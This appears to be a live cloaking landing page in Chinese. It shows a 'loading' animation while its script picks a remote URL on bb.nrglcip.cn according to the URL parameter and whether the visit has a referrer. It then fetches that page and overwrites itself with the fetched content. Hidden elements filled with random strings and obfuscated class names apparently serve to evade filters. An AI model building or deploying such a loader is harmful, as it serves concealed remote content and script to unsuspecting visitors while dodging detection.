<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .nRgyUBVjXV {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .nRgyUBVjXV .f5uUokjckQz {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .nRgyUBVjXV .content {
            line-height: 50px;
            text-align: center
        }

        .nRgyUBVjXV .img {
            width: 100%
        }

        .nRgyUBVjXV .Xaw2W2 {
            text-align: center
        }

        .nRgyUBVjXV .Xaw2W2 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .nRgyUBVjXV .Xaw2W2 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .nRgyUBVjXV .Xaw2W2 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .nRgyUBVjXV .Xaw2W2 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .nRgyUBVjXV .Xaw2W2 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .nRgyUBVjXV .Xaw2W2 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .nRgyUBVjXV .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function o23hJSCvdX(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var n0OEV = o23hJSCvdX('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ n0OEV +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ n0OEV +".html?a=share";
		}
		
        r8cxKs=url+"#"+new Date().getTime();
        r8cxKs && function() {
            $.get(r8cxKs, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<ul style='display:none' >UzW3J1BIsFZx3ptxRZpRbACxpHptO</ul>
<b style='display:none' >lMvvC4TGgSV89EutAFwkIo5zQZWxrUYxQpCOMKgCXFfFixtk5f0dNDYy90ER82X8BwDiEHu0fLExsovZbSWKoAp</b>
<h1 style='display:none' >IIs9CgHbmxe0zjUdq</h1>
<a  href='#' style='display:none'>vspTEcQA1dI2pVnowS9tIdejImBJtKStR3VtNkx2rxQYrteW</a>
<b style='display:none' >lMvvC4TGgSV89EutAFwkIo5zQZWxrUYxQpCOMKgCXFfFixtk5f0dNDYy90ER82X8BwDiEHu0fLExsovZbSWKoAp</b>
<li style='display:none' >DJRoJsXEdb0yE3Wi8gAyEhrAgu</li><div class="nRgyUBVjXV">
    <div class="f5uUokjckQz">
        <div class="Xaw2W2">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>pym6hbl6FFPgILjtzHBs4lkpvWqK99BWZvBPJ2YPfl6p2rikiHzeqJUna0Rb5EX2xB8AfCtueJbcTm8</p>
<img  src='' style='display:none'>
<span style='display:none'>v1JvhWr2TZq</span>
<b style='display:none' >EKVryBJuX8ighR7WD0lxXl94PHVcEWkOY33aYT5NS4LqxCenHKLoj2icul07umlBojtJjL3TkyI818JScOqOzcP</b>
<p  style='display:none'>pym6hbl6FFPgILjtzHBs4lkpvWqK99BWZvBPJ2YPfl6p2rikiHzeqJUna0Rb5EX2xB8AfCtueJbcTm8</p>
<p  style='display:none'>pym6hbl6FFPgILjtzHBs4lkpvWqK99BWZvBPJ2YPfl6p2rikiHzeqJUna0Rb5EX2xB8AfCtueJbcTm8</p>
<b style='display:none' >EKVryBJuX8ighR7WD0lxXl94PHVcEWkOY33aYT5NS4LqxCenHKLoj2icul07umlBojtJjL3TkyI818JScOqOzcP</b></body>
</html>